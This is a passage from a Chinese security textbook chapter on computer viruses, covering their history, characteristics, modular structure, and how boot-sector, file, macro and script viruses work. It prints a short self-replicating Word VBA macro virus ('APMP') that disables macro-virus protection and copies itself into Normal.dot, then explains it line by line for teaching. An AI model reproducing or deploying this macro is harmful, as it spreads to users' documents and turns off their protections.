信息技術(shù)-趙澤茂-第十三章

13.1計(jì)算機(jī)病毒概述13.2計(jì)算機(jī)病毒的基本結(jié)構(gòu)13.3計(jì)算機(jī)病毒的基本原理13.4反病毒技術(shù)13.5典型病毒的特征及清除方法小結(jié)習(xí)題計(jì)算機(jī)病毒隱藏在計(jì)算機(jī)系統(tǒng)的可存取信息資源中，利用系統(tǒng)信息資源進(jìn)行繁殖并且生存，影響計(jì)算機(jī)系統(tǒng)正常運(yùn)行，并通過系統(tǒng)信息關(guān)系和途徑進(jìn)行傳染，這個觀點(diǎn)最早由美國計(jì)算機(jī)病毒研究專家弗雷德·科恩博士提出。

計(jì)算機(jī)病毒有很多種定義，國外最流行的定義為:計(jì)算機(jī)病毒是一段附著在其他程序上的可以實(shí)現(xiàn)自我繁殖的程序代碼。在《中華人民共和國計(jì)算機(jī)信息系統(tǒng)安全保護(hù)條例》中的定義為:“計(jì)算機(jī)病毒是指編制或者在計(jì)算機(jī)程序中插入的破壞計(jì)算機(jī)功能或者數(shù)據(jù)，影響計(jì)算機(jī)使用并且能夠自我復(fù)制的一組計(jì)算機(jī)指令或者程序代碼”。從廣義上說，凡能夠引起計(jì)算機(jī)故障，破壞計(jì)算機(jī)數(shù)據(jù)的程序統(tǒng)稱為計(jì)算機(jī)病毒。13.1計(jì)算機(jī)病毒概述13.1.1計(jì)算機(jī)病毒的發(fā)展歷史

在計(jì)算機(jī)剛剛出現(xiàn)不久的1949年，計(jì)算機(jī)先驅(qū)馮·諾依曼在《復(fù)雜自動機(jī)組織論》論文中提出了能自我復(fù)制的計(jì)算機(jī)程序的構(gòu)想，這實(shí)際上就是計(jì)算機(jī)病毒程序。在以后的很多年中，這種能自我繁殖的類似于生命的程序，僅僅作為一種理論存在于科學(xué)家的頭腦中。直到十年之后，貝爾實(shí)

驗(yàn)室的年輕程序員受到馮·諾依曼理論的啟發(fā)，發(fā)明了“磁芯大戰(zhàn)”游戲。玩這個游戲的兩個人編制了許多能自我復(fù)制的程序，雙方的程序在指令控制下就會竭力去消滅對方的程序。在預(yù)定的時間內(nèi)，誰的程序繁殖得多，誰就獲勝。這種有趣的游戲很快就傳播到了其他計(jì)算機(jī)中心。1983年11月3日，美國計(jì)算機(jī)安全專家弗雷德·科恩博士研制出了一種在運(yùn)行過程中可以自我復(fù)制的破壞性程序，倫·艾德勒曼將它命名為計(jì)算機(jī)病毒，并在每周一次的計(jì)算機(jī)安全討論會上正式提出，隨后將該程序在VAX/11機(jī)上進(jìn)行了攻擊試驗(yàn)，并獲得成功，從而在實(shí)驗(yàn)上驗(yàn)證了計(jì)算機(jī)病

毒的存在。到了1987年，第一個計(jì)算機(jī)病毒C-BRAIN誕生了。一般而言，業(yè)界公認(rèn)這是真正具備完整特征的計(jì)算機(jī)病毒始祖。這個病毒程序是由巴斯特和阿姆杰德所寫的，由于當(dāng)?shù)乇I拷軟件的風(fēng)氣非常盛行，因此他們的目的主要是為了防止他們的軟件被任意盜拷。只要有人盜拷他們的軟件，C-BRAIN就

會發(fā)作，將盜拷者的硬盤剩余空間給吃掉。1988年11月3日，美國6000臺計(jì)算機(jī)被病毒感染，造成Internet不能正常運(yùn)行。這次事件中遭受攻擊的包括5個計(jì)算機(jī)中心和12個地區(qū)結(jié)點(diǎn)，連接著政府、大學(xué)、研究所和擁有政府合同的250000臺計(jì)算機(jī)。這次病毒事件導(dǎo)致計(jì)算機(jī)系統(tǒng)直接經(jīng)濟(jì)損失達(dá)9600萬美元。這個病毒程序的設(shè)計(jì)者為羅

伯特·莫里斯，當(dāng)年23歲，是在康奈爾(Cornell)大學(xué)攻讀學(xué)位的研究生。1996年，出現(xiàn)了針對微軟公司Office的“宏病毒”。1997年被公認(rèn)為計(jì)算機(jī)反病毒界的“宏病毒年”。

1998年，首例破壞計(jì)算機(jī)硬件的CIH病毒出現(xiàn)，引起人們的恐慌。1999年4月26日，CIH病毒在全世界大規(guī)模爆發(fā)，導(dǎo)致數(shù)百萬臺計(jì)算機(jī)癱瘓，造成上百億美元的損失。

進(jìn)入21世紀(jì)，以蠕蟲病毒與木馬病毒為主的網(wǎng)絡(luò)病毒成為計(jì)算機(jī)病毒的主流。蠕蟲病毒與木馬病毒是近年爆發(fā)最為頻繁的病毒。據(jù)統(tǒng)計(jì):蠕蟲病毒占了2004年所有病毒感染的35%，木馬病毒占據(jù)49%以上的比例，黑客病毒占據(jù)14%的比例，其余2%的比例被腳本病毒所占據(jù)?？傮w上說，計(jì)算機(jī)病毒隨計(jì)算機(jī)技術(shù)的發(fā)展而發(fā)展，伴隨著操作系統(tǒng)的更新?lián)Q代，病毒也會采用新的技術(shù)實(shí)現(xiàn)其功能，產(chǎn)生新型病毒。但不同病毒的行為特征仍是基本相同的。

計(jì)算機(jī)病毒的發(fā)展可大致劃分為以下幾個階段。

1.第一代計(jì)算機(jī)病毒

第一代計(jì)算機(jī)病毒的產(chǎn)生年限可以認(rèn)為在1986~1989年之間，這一期間出現(xiàn)的病毒可稱為傳統(tǒng)病毒，這一時期是計(jì)算機(jī)病毒的萌芽和滋生時期。由于當(dāng)時計(jì)算機(jī)的應(yīng)用軟件少，而且大多是單機(jī)運(yùn)行環(huán)境，因此病毒沒有大量流行，流行病毒的種類也很有限，病毒的清除工作相對來說較容易。這一階段的計(jì)算機(jī)病毒具有如下的一些特點(diǎn):

(1)病毒攻擊的目標(biāo)比較單一，或者是傳染磁盤引導(dǎo)扇區(qū)，或者是傳染可執(zhí)行文件。

(2)病毒程序主要采取截獲系統(tǒng)中斷向量的方式監(jiān)視系統(tǒng)的運(yùn)行狀態(tài)，并在一定的條件下對目標(biāo)進(jìn)行傳染。

(3)目標(biāo)被病毒傳染以后的特征比較明顯，如磁盤上出現(xiàn)壞扇區(qū)，可執(zhí)行文件的長度增加，文件建立日期、時間發(fā)生變化等。這些特征容易通過人工方式或查毒軟件來發(fā)現(xiàn)。(4)病毒程序不具有自我保護(hù)的措施，容易被人們分析和解剖，從而使得人們?nèi)菀拙幹葡鄳?yīng)的殺毒軟件。然而，隨著計(jì)算機(jī)反病毒技術(shù)的提高和反病毒產(chǎn)品的不斷涌現(xiàn)，病毒編制者也在不斷地總結(jié)自己的編程技巧和經(jīng)驗(yàn)，千方百計(jì)地逃避反病毒產(chǎn)品的分析、檢測和解毒，從而出現(xiàn)了第二代計(jì)算機(jī)病毒。

2.第二代計(jì)算機(jī)病毒

第二代計(jì)算機(jī)病毒又稱為混合型病毒，其產(chǎn)生的年限可以認(rèn)為在1989~1991年之間，它是計(jì)算機(jī)病毒由簡單發(fā)展到復(fù)雜，由單純走向成熟的階段。這一階段的計(jì)算機(jī)病毒具有如下特點(diǎn):

(1)病毒攻擊的目標(biāo)趨于混合型，即一種病毒既可傳染磁盤引導(dǎo)扇區(qū)，又可傳染可執(zhí)行文件。

(2)病毒程序不采用明顯地截獲中斷向量的方法監(jiān)視系統(tǒng)的運(yùn)行，而采取更為隱蔽的方法駐留內(nèi)存和傳染目標(biāo)。(3)病毒傳染目標(biāo)后沒有明顯的特征，如磁盤上不出現(xiàn)壞扇區(qū)、可執(zhí)行文件的長度增加不明顯、不改變被傳染文件原來的建立日期和時間等。

(4)病毒程序往往采取了自我保護(hù)措施，如加密技術(shù)、反跟蹤技術(shù)等來制造障礙，增加人們分析和解剖的難度，同時也增加了軟件檢測、殺毒的難度。(5)出現(xiàn)了許多病毒的變種，這些變種病毒較原病毒的傳染性更隱蔽，破壞性更大。

總之，這一時期出現(xiàn)的病毒不僅在數(shù)量上急劇地增加，更重要的是病毒從編制的方式、方法，駐留內(nèi)存以及對宿主程序的傳染方式、方法等方面都有了較大的變化。

3.第三代計(jì)算機(jī)病毒

第三代計(jì)算機(jī)病毒的產(chǎn)生年限可以認(rèn)為在1992~1995年之間，此類病毒稱為“多態(tài)性”或“自我變形”病毒。“多態(tài)性”或“自我變形”病毒在每次傳染目標(biāo)時，放入宿主程序中的病毒程序大部分都是可變的，即在搜集到同一種病毒

的多個樣本中，病毒程序的代碼絕大多數(shù)是不同的，這是此類病毒的重要特點(diǎn)。因此，傳統(tǒng)的利用特征碼法檢測病毒的產(chǎn)品不能檢測出此類病毒。據(jù)資料介紹，此類病毒的首創(chuàng)者是MarkWashburn，他并不是病毒的有意制造者，而是一位反病毒的技術(shù)專家。他編寫此類病毒的目的是為了研究，即證明特征代碼檢測法不是在任何場合下都是有效的。1992年上半年，在保加利亞發(fā)現(xiàn)了黑夜復(fù)仇者(DarkAvenger)病毒的變種“Mutation

DarkAvenger”。這是世界上最早發(fā)現(xiàn)的多態(tài)性病毒，它可用獨(dú)特的加密算法產(chǎn)生幾乎無限數(shù)量的不同形態(tài)的同一病毒。我國在1994年發(fā)現(xiàn)了多態(tài)性病毒——“幽靈”病毒，迫使許多反病毒技術(shù)部門開發(fā)了相應(yīng)的檢測和殺毒產(chǎn)品。由此可見，第三階段是病毒的成熟發(fā)展階段。在這一階段中病毒的發(fā)展主要是病毒技術(shù)的發(fā)展，病毒開始向多維化方向發(fā)展。計(jì)算機(jī)病毒將與病毒自身運(yùn)行的時間、空間和宿主程序緊密相關(guān)，這無疑將導(dǎo)致計(jì)算機(jī)病毒檢測和消除的困難。

4.第四代計(jì)算機(jī)病毒

20世紀(jì)90年代中后期，隨著遠(yuǎn)程網(wǎng)、遠(yuǎn)程訪問服務(wù)的開通，病毒流行面更加廣泛，病毒迅速突破地域的限制，首先通過廣域網(wǎng)傳播至局域網(wǎng)內(nèi)，再在局域網(wǎng)內(nèi)傳播擴(kuò)散。1996年下半年，隨著國內(nèi)Internet的大量普及和E-mail的使用，夾雜于E-mail內(nèi)的Word宏病毒成為當(dāng)時病毒的主流。由于宏

病毒編寫簡單、破壞性強(qiáng)、清除繁雜，加上微軟對DOC文檔結(jié)構(gòu)沒有公開，給直接基于文檔結(jié)構(gòu)清除宏病毒帶來了諸多不便。這一階段病毒的最大特點(diǎn)是利用Internet作為其主要傳播途徑，因而病毒傳播快、隱蔽性強(qiáng)、破壞性大。現(xiàn)今的網(wǎng)絡(luò)時代，病毒的發(fā)展呈現(xiàn)出以下趨勢:

(1)病毒與黑客程序相結(jié)合。

(2)蠕蟲病毒更加泛濫，病毒破壞性更大。

(3)制作病毒的方法更簡單，傳播速度更快，傳播渠道更多。

(4)病毒的實(shí)時檢測更困難。13.1.2計(jì)算機(jī)病毒的特征

根據(jù)對計(jì)算機(jī)病毒的產(chǎn)生、傳染和破壞行為的分析，所有計(jì)算機(jī)病毒都具有(或者部分具有)下述的特性，這些特性是病毒賴以生存的手段和機(jī)制，是計(jì)算機(jī)病毒對抗技術(shù)中必須涉及的重要問題。

1.傳染性

傳染性是病毒最基本的特征。計(jì)算機(jī)病毒的傳染性是指病毒具有把自身復(fù)制到其他程序中的能力。計(jì)算機(jī)病毒會通過各種渠道從已被感染的計(jì)算機(jī)擴(kuò)散到未被感染的計(jì)算機(jī)，在某些情況下造成被感染的計(jì)算機(jī)工作失常甚至癱瘓。計(jì)算機(jī)病毒能通過程序本身的代碼，強(qiáng)行傳染到一切符合其傳染條件而未受到傳染的程序之上。

計(jì)算機(jī)病毒可通過各種可能的渠道，如軟盤、光盤、移動存儲器、計(jì)算機(jī)網(wǎng)絡(luò)去傳染其他的計(jì)算機(jī)。

是否具有傳染性是判別一個程序是否為計(jì)算機(jī)病毒的首要條件。

2.破壞性

任何病毒只要侵入系統(tǒng)，都會對系統(tǒng)及應(yīng)用程序產(chǎn)生程度不同的影響。輕者會降低計(jì)算機(jī)工作效率、占用系統(tǒng)資源；重者可導(dǎo)致數(shù)據(jù)丟失、系統(tǒng)崩潰。

根據(jù)計(jì)算機(jī)病毒的破壞性程度可粗略地將病毒分為良性病毒和惡性病毒。良性病毒不包含立即直接破壞的代碼，但這類病毒的潛在破壞是有的，它使內(nèi)存空間減少，占用磁盤空間，降低系統(tǒng)運(yùn)行效率，使某些程序不能運(yùn)行，它還與操作系統(tǒng)和應(yīng)用程序爭搶CPU的控制權(quán)，嚴(yán)重時導(dǎo)致系統(tǒng)死機(jī)、

網(wǎng)絡(luò)癱瘓等。惡性病毒在代碼中包含有損傷、破壞計(jì)算機(jī)系統(tǒng)的操作，在其傳染或發(fā)作時會對系統(tǒng)直接造成嚴(yán)重?fù)p壞。

3.隱蔽性

計(jì)算機(jī)病毒一般是具有很高的編程技巧、短小精悍的程序。它通常附在正常程序中或磁盤較隱蔽的地方，也有個別的以隱含文件的形式出現(xiàn)，目的是不讓用戶發(fā)現(xiàn)它的存在。如果不經(jīng)過代碼分析，病毒程序與正常程序是不容易區(qū)別開來的。計(jì)算機(jī)病毒的隱蔽性表現(xiàn)在傳染的隱蔽性和病毒程序

存在的隱蔽性兩個方面。一般在沒有防護(hù)措施的情況下，計(jì)算機(jī)病毒程序取得系統(tǒng)控制權(quán)后，可以在很短的時間里傳染大量程序，而且受到傳染后，計(jì)算機(jī)系統(tǒng)通常仍能正常運(yùn)行，不會感到任何異常。正是由于隱蔽性，計(jì)算機(jī)病毒才可以在沒有察覺的情況下擴(kuò)散到上百萬臺計(jì)算機(jī)中。

4.潛伏性與可觸發(fā)性

大部分病毒在感染系統(tǒng)后一般不會馬上發(fā)作，而是長期隱藏在系統(tǒng)中，除了傳染外，不表現(xiàn)出破壞性，只有在滿足其特定條件后才啟動其表現(xiàn)模塊，顯示發(fā)作信息或進(jìn)行系統(tǒng)破壞。病毒的潛伏性越好，它在系統(tǒng)中的存在時間就會越長，傳染范圍就會越大。計(jì)算機(jī)病毒因某個事件或數(shù)值的出現(xiàn)，誘使病毒實(shí)施感染或進(jìn)行攻擊的特性稱為可觸發(fā)性。使計(jì)算機(jī)病毒發(fā)作的觸發(fā)條件主要有以下3種:

(1)利用系統(tǒng)時鐘提供的時間作為觸發(fā)條件。

(2)利用病毒體自帶的計(jì)數(shù)器作為觸發(fā)條件。

(3)利用計(jì)算機(jī)內(nèi)執(zhí)行的某些特定操作作為觸發(fā)條件。

5.不可預(yù)見性

不同種類的病毒，它們的代碼千差萬別，但有些操作技術(shù)是共同的(如駐內(nèi)存、改中斷)。有些人利用病毒的這種共性，制作了聲稱可查所有病毒的程序。這種程序的確可查出一些新病毒，但由于目前的軟件種類極其豐富，有些正常程序也使用了類似病毒的操作，甚至借鑒了某些病毒的技術(shù)。使用這種方法對病毒進(jìn)行檢測勢必會造成較多的誤報(bào)情況，而且病毒的制作技術(shù)也在不斷提高，病毒對于反病毒軟件來說永遠(yuǎn)是超前的。計(jì)算機(jī)病毒是一種特殊程序，其最大的特點(diǎn)是具有感染能力。病毒的感染動作受到觸發(fā)機(jī)制的控制，同樣受病毒觸發(fā)機(jī)制控制的還有病毒的破壞動作。病毒程序一般由主控模塊、感染模塊、觸發(fā)模塊和破壞模塊組成，但并不是所有的病毒都具備這4個模塊，如巴基斯坦病毒就沒有破壞模塊。13.2計(jì)算機(jī)病毒的基本結(jié)構(gòu)

1.主控模塊

主控模塊在總體上控制病毒程序的運(yùn)行，協(xié)調(diào)其他模塊的運(yùn)作。染毒程序運(yùn)行時，首先運(yùn)行的是病毒的主控模塊。其基本動作如下：

(1)調(diào)用感染模塊，進(jìn)行感染。

(2)調(diào)用觸發(fā)模塊，接收其返回值。

(3)如果返回真值，則執(zhí)行破壞模塊。

(4)如果返回假值，則執(zhí)行后續(xù)程序。一般來說，主控模塊除完成上述動作外，還要執(zhí)行下述動作:

(1)調(diào)查運(yùn)行的環(huán)境，如確定系統(tǒng)內(nèi)存容量、磁盤設(shè)置等參數(shù)。

(2)常駐內(nèi)存的病毒還要請求內(nèi)存區(qū)、傳送病毒代碼、修改中斷向量表等動作。

(3)處理病毒運(yùn)行時的意外情況，防止病毒自身信息的暴露。

2.感染模塊

感染模塊的作用是將病毒代碼傳染到其他對象上去，負(fù)責(zé)實(shí)現(xiàn)感染機(jī)制。有的病毒有一個感染標(biāo)志(又稱病毒簽名)，但不是所有的病毒都有感染標(biāo)志。感染標(biāo)志是一些數(shù)字或字符串，它們以ASCII碼方式存放在宿主程序里。一般病毒在對目標(biāo)程序傳染前會判斷感染條件，如是否有感染標(biāo)志或文件類型是否符合傳染標(biāo)準(zhǔn)等，具體如下:

(1)尋找一個適合感染的文件。

(2)檢查該文件中是否有感染標(biāo)志。

(3)如果沒有感染標(biāo)志，則進(jìn)行感染，將病毒代碼放入宿主程序。感染標(biāo)志不僅被病毒用來決定是否實(shí)施感染，還被病毒用來實(shí)施欺騙。不同病毒的感染標(biāo)志的位置、內(nèi)容都不同。通常，殺毒軟件將感染標(biāo)志作為病毒的特征碼之一。同時，人們也可以利用病毒根據(jù)有無感染標(biāo)志感染這一特性，人為地、主動地在文件中添加感染標(biāo)志，從而在某種程度上

達(dá)到病毒免疫的目的。

3.觸發(fā)模塊

觸發(fā)模塊根據(jù)預(yù)定條件滿足與否，控制病毒的感染或破壞動作。病毒的觸發(fā)條件有多種形式，主要有日期和時間觸發(fā)、鍵盤觸發(fā)、啟動觸發(fā)、磁盤訪問觸發(fā)和中斷訪問觸發(fā)及其他觸發(fā)方式。

病毒觸發(fā)模塊的主要功能如下:

(1)檢查預(yù)定觸發(fā)條件是否滿足。

(2)如果滿足，返回真值。

(3)如果不滿足，返回假值。

4.破壞模塊

破壞模塊負(fù)責(zé)實(shí)施病毒的破壞工作，其內(nèi)部是實(shí)現(xiàn)病毒編寫者預(yù)定破壞動作的代碼。這些破壞動作可能是破壞文件和數(shù)據(jù)，也可能是降低計(jì)算機(jī)的空間效率和時間效率或使計(jì)算機(jī)系統(tǒng)崩潰。

計(jì)算機(jī)病毒的破壞現(xiàn)象和表現(xiàn)癥狀因具體病毒而異;計(jì)算機(jī)病毒的破壞行為和破壞程度，取決于病毒編寫者的主觀愿望和技術(shù)能力。有些病毒的該模塊并沒有明顯的惡意破壞行為，僅在被感染的系統(tǒng)設(shè)備上表現(xiàn)出特定的現(xiàn)象，該模塊有時又被稱為表現(xiàn)模塊。在結(jié)構(gòu)上，破壞模塊一般分為兩部分:一部分判斷破壞的條件;另一部分執(zhí)行破壞的功能。病毒在DOS時代就非常瘋狂，雖然現(xiàn)在DOS病毒已經(jīng)沒有容身之所，但對DOS病毒的機(jī)理進(jìn)行研究還是具有相當(dāng)大的意義的。進(jìn)入Windows時代和互聯(lián)網(wǎng)時代，病毒有了飛速的發(fā)展。

由于篇幅的限制，本節(jié)對Windows下的PE病毒沒有進(jìn)行專門的闡述，而是介紹了DOS時代、Windows時代、互聯(lián)網(wǎng)時代的具有代表性的病毒類型的基本原理。13.3計(jì)算機(jī)病毒的基本原理13.3.1引導(dǎo)型病毒

引導(dǎo)型病毒是一種在ROMBIOS之后，系統(tǒng)引導(dǎo)時出現(xiàn)的病毒，它先于操作系統(tǒng)，依托的環(huán)境是BIOS中斷服務(wù)程序。引導(dǎo)型病毒是利用操作系統(tǒng)的引導(dǎo)模塊放在某個固定的位置，并且控制權(quán)的轉(zhuǎn)交方式是以物理位置為依據(jù)，而不是以操作系統(tǒng)引導(dǎo)區(qū)的內(nèi)容為依據(jù)的，因而病毒占據(jù)該物理位置即可獲得控制權(quán)，而將真正的引導(dǎo)區(qū)的內(nèi)容轉(zhuǎn)移或替換，待病毒程序執(zhí)行后，將控制權(quán)交給真正的引導(dǎo)區(qū)內(nèi)容，使得這個帶病毒的系統(tǒng)看似正常運(yùn)轉(zhuǎn)，而病毒已隱藏在系統(tǒng)中并伺機(jī)傳染、發(fā)作。簡單地說，引導(dǎo)型病毒就是改寫磁盤上的引導(dǎo)扇區(qū)(BootSector)信息的病毒。引導(dǎo)型病毒通常用匯編語言編寫，因此病毒程序很短，執(zhí)行速度很快。引導(dǎo)型病毒的基本原理如圖13-3-1所示。

引導(dǎo)型病毒的主要特點(diǎn)如下:

(1)引導(dǎo)型病毒是在操作系統(tǒng)之前進(jìn)入內(nèi)存的，寄生的對象又相對固定，因此該類型病毒基本上不得不采用減少操作系統(tǒng)所掌管的內(nèi)存容量的方法來駐留內(nèi)存高端。而正常的系統(tǒng)引導(dǎo)過程是不減少系統(tǒng)內(nèi)存的。圖13-3-1引導(dǎo)型病毒的基本原理(2)引導(dǎo)型病毒需要把病毒傳染給軟盤，一般是通過修改INT13H的中斷向量，新INT13H中斷向量段地址必定指向內(nèi)存高端的病毒程序。

(3)引導(dǎo)型病毒感染硬盤時，必定駐留在硬盤的主引導(dǎo)扇區(qū)或引導(dǎo)扇區(qū)中，并且只駐留一次。因此，引導(dǎo)型病毒一般都是在軟盤啟動過程中把病毒傳染給硬盤的。正常的引導(dǎo)過程一般是不對硬盤主引導(dǎo)扇區(qū)或引導(dǎo)扇區(qū)進(jìn)行寫操作的。引導(dǎo)型病毒按其寄生對象的不同分為MBR(主引導(dǎo)區(qū))病毒和BR(引導(dǎo)區(qū))病毒兩類。MBR病毒也稱分區(qū)病毒，將病毒寄生在硬盤分區(qū)主引導(dǎo)程序所占據(jù)的硬盤0頭0柱面的第1個扇區(qū)中，典型的病毒有大麻(Stoned)病毒、INT60病毒。BR病毒是將病毒寄生在軟盤或硬盤邏輯0扇區(qū)中，典型的病毒有小球病毒、Brain病毒等。13.3.2文件型病毒

文件型病毒是在其他文件中插入自身指令，將自身代碼通過編碼、加密或使用其他技術(shù)附在文件中，當(dāng)文件被執(zhí)行時，將會調(diào)用病毒的代碼。同時文件型病毒還經(jīng)常將控制權(quán)還給主程序，偽裝計(jì)算機(jī)系統(tǒng)正常運(yùn)行。一旦運(yùn)行被感染了病毒的程序文件，病毒便被激發(fā)，從此，病毒便開始時刻監(jiān)視著系統(tǒng)的運(yùn)行，等待時機(jī)。一旦條件滿足，病毒就會發(fā)作起來，完成一定的操作(傳染、表現(xiàn)或破壞)。文件型病毒感染文件后留下標(biāo)記，以后不再重復(fù)感染。通常，這個執(zhí)行過程發(fā)生得很快，用戶并不知道病毒代碼已

被執(zhí)行。文件型病毒感染COM文件有兩種方法，即分別將病毒代碼加在COM文件的前部和尾部。在感染的過程中，病毒將COM文件的開始3字節(jié)改寫為跳轉(zhuǎn)到病毒代碼的指令。由于COM文件與執(zhí)行時的內(nèi)存映像完全相同，因此被感染的COM文件在執(zhí)行時將首先運(yùn)行病毒代碼，病毒就在該文件之前搶先奪取了系統(tǒng)控制權(quán)。一旦病毒奪取了系統(tǒng)控制權(quán)，就開始進(jìn)行其自身的引導(dǎo)工作。在一般情況下，病毒先將自身駐留到內(nèi)存中，并為病毒的傳染模塊和表現(xiàn)模塊設(shè)置好一定的觸發(fā)條件，然后，病毒就開始監(jiān)視系統(tǒng)的運(yùn)行。完成了這些工作之后，病毒才會將系統(tǒng)控制權(quán)交還給用戶執(zhí)行的可執(zhí)行文件。文件型病毒的基本原理如圖13-3-2所示。圖13-3-2文件型病毒的基本原理13.3.3宏病毒

所謂宏(macro)，就是軟件設(shè)計(jì)者為了讓人們在使用軟件進(jìn)行工作時，避免一再地重復(fù)相同的動作而設(shè)計(jì)出來的一種工具，它利用簡單的語法，把常用的動作寫成類似批處理命令的多行代碼的集合。

所謂宏病毒，就是一種寄存在文檔或模板的宏中的計(jì)算機(jī)病毒。一旦打開這樣的文檔，其中的宏就會被執(zhí)行，宏病毒就會被激活，轉(zhuǎn)移到計(jì)算機(jī)上，并駐留在Normal模板上。從此以后，所有自動保存的文檔都會被“感染”上這種宏病毒，而且如果其他用戶打開了已被感染病毒的文檔，宏病毒又會轉(zhuǎn)移到他的計(jì)算機(jī)上。相比于傳統(tǒng)的病毒，宏病毒不感染EXE和COM文件，也不需要通過引導(dǎo)區(qū)傳播，它只是感染文檔文件。Word宏病毒是利用MicrosoftWord的開放性專門制作的具有病毒特點(diǎn)的宏的集合。

這種病毒宏的集合影響到計(jì)算機(jī)的使用，并能夠鞏固DOC文檔及DOT模板的自我復(fù)制及傳播。Word宏病毒在發(fā)作時，會使Word運(yùn)行出現(xiàn)怪現(xiàn)象，如自動創(chuàng)建文件、打開窗口、內(nèi)存不夠、存盤文件丟失等，有的使打印機(jī)無法正常打印。Word宏病毒在傳染時，會使原有文件屬性和類型發(fā)生改變，或Word自動對磁盤進(jìn)行操作等。當(dāng)內(nèi)存中有Word宏病毒時，原Word文檔無法另存為其他格

式的文件，只能以模板形式進(jìn)行存儲。宏病毒的工作原理如圖13-3-3所示。圖13-3-3宏病毒的工作原理宏病毒概括起來有如下特點(diǎn):

(1)以數(shù)據(jù)文件方式傳播，隱蔽性好，傳播速度快。

(2)制作宏病毒以及在原型病毒上產(chǎn)生變種非常方便

(3)破壞可能性極大。

(4)宏病毒的兼容性不高。

所有的宏病毒都有一個基本的結(jié)構(gòu)，它們總是使用感染病毒的自啟動模板來開始它們特定的幾個行為，例如FileSaveAs、FileSave、FileOpen、ToolsMacros。已感染的文檔傳染其他的文檔，并且執(zhí)行下次啟動時打開它們。下面以一個簡單宏病毒的例子來分析宏病毒的作用機(jī)理?！銩PMP′感染標(biāo)志

PrivateSubDocument_Open()

OnErrorResumeNext

Application.DisplayStatusBar=False

Options.VirusProtection=False

Options.SaveNormalPrompt=False′以上都是基本

的自我隱藏措施MyCode=ThisDocument.VBProject.VBComponents(1).

CodeModule.Lines(1，20)

SetHost=NormalTemplate.VBProject.VBComponents(1).CodeModule

IfThisDocument=NormalTemplateThen_

SetHost=ActiveDocument.VBProject.VBComponents(1).CodeModule

WithHost

If.Lines(1，1)<>“‘APMP”Then

′判斷感染標(biāo)志

.DeleteLines1，.CountOfLines′刪除目標(biāo)文件所有代碼

.InsertLines1，MyCode′向目標(biāo)文檔寫入病毒代碼IfThisDocument=NormalTemplateThen_

ActiveDocument.SaveAsActiveDocument.FullName

EndIf

EndWith

MsgBox"Basicclassmacrobyjackie"，vbOKOnly，"APMP"

EndSub上述病毒共20行。第1行的′APMP是病毒的感染標(biāo)志;第3~6行是自我隱藏措施，其中第3行是如果發(fā)生錯誤，不彈出出錯窗口，繼續(xù)執(zhí)行下面的語句;第4行，不顯示狀態(tài)欄，以免顯示宏的運(yùn)行狀態(tài);第5行，關(guān)閉病毒的保護(hù)功能，運(yùn)行前如果包含宏，不提示;第6行，如果公用模塊被修改，不彈出提示窗口而直接保存;第7行，將當(dāng)前文件1~20行代碼賦給字符串OurCode;第8行，對象Host作為感染目標(biāo)取代默認(rèn)模板的VB代碼塊;第9、10行，如果病毒代碼是在默認(rèn)模板中執(zhí)行的，則將當(dāng)前活動文檔設(shè)置為感染目標(biāo);第12行，刪除目標(biāo)文件中的所有代碼;第13行，向目標(biāo)文件寫入病毒代碼;第15、16行，自動保存被感染的文檔，以免再次提示用戶保存修改過的文檔，引起用戶的懷疑;第19行，顯示窗口，標(biāo)題為“APMP”，框內(nèi)內(nèi)容為“BasicclassmacrobyJackie”。Word文件通過模板來創(chuàng)建，一般情況下，Word缺省的公用模板為Normal.dot，感染Normal.dot模板也就成了宏病毒最常用的傳染方式。通常，Word宏病毒至少會包含一個以上的自動宏，或者是包含一個以上的標(biāo)準(zhǔn)宏，如FileOpen、FileSaveAs等。如果某個DOC文件感染了這類Word宏病毒，則當(dāng)Word運(yùn)行這類宏時，實(shí)際上就是運(yùn)行了病毒代碼。由標(biāo)準(zhǔn)宏和自動宏構(gòu)成宏病毒，其內(nèi)部都具有把帶病毒的宏復(fù)制到通用宏的代碼段，也就是說宏病毒通過這種方式實(shí)現(xiàn)對其他文件的傳染。當(dāng)Word系統(tǒng)退出時，它會自動地把所有通用宏(當(dāng)然也包括傳染進(jìn)來的病毒宏)保存到模板文件(即*.DOT文件，通常為Normal.dot)中，當(dāng)Word系統(tǒng)再次啟動時，它又會自動地把所有通用宏(包括病毒宏)從模板中裝入。一旦Word系統(tǒng)遭受感染，以后每當(dāng)Word系統(tǒng)進(jìn)行初始化時，都會隨標(biāo)準(zhǔn)模板

文件(Normal.dot)的裝入而成為帶毒的Word系統(tǒng)，進(jìn)而在打開和創(chuàng)建任何文檔時感染該文檔。當(dāng)含有自動宏的宏病毒染毒文檔被其他計(jì)算機(jī)的Word系統(tǒng)打開時，便會自動感染該計(jì)算機(jī)的Word系統(tǒng)。13.3.4腳本病毒

腳本病毒是以腳本程序語言(如VBScript、JavaScript、PHP)編寫而成的病毒。腳本是指從一個數(shù)據(jù)文檔中執(zhí)行一個任務(wù)的一組指令，這一點(diǎn)與宏相似(有時宏和腳本可以交替使用)。與宏相同，腳本也是嵌入到一個靜止的文件中的，它們的指令是由一個應(yīng)用程序而不是由計(jì)算機(jī)的處理器運(yùn)行的。腳本程序的執(zhí)行離不開WSH(WindowsScriptingHost，Windows腳本宿主)環(huán)境，WSH內(nèi)嵌于Windows操作系統(tǒng)中的腳本語言工作環(huán)境，主要負(fù)責(zé)腳本的解釋和執(zhí)行。WSH是微軟提供的一種基于32位Windows平臺、與語言無關(guān)的腳本解釋機(jī)制，它使得腳本能夠直接在Windows桌面或命令提示符下運(yùn)行。WSH依賴于IE提供的VBScript和JavaScript腳本引擎，所對應(yīng)的程序“C:＼Windows＼wscript.exe”是一個腳本語言解釋器。創(chuàng)建腳本病毒只需簡單的編程知識，它們的代碼盡可能精簡。腳本病毒可以使用Windows中預(yù)先定義的對象來更容易地訪問被感染系統(tǒng)的其他部分。腳本病毒的代碼為文本編寫，其他人很容易讀取并模仿，因此，很多腳本病毒都有變體。腳本病毒都是使用應(yīng)用程序和操作系統(tǒng)中的自動腳本功能來復(fù)制和傳播惡意腳本的。它主要通過電子郵件和網(wǎng)頁進(jìn)行傳播。目前，網(wǎng)絡(luò)中的惡意代碼開始威脅到網(wǎng)絡(luò)系統(tǒng)的安全，一般分為如下幾種:

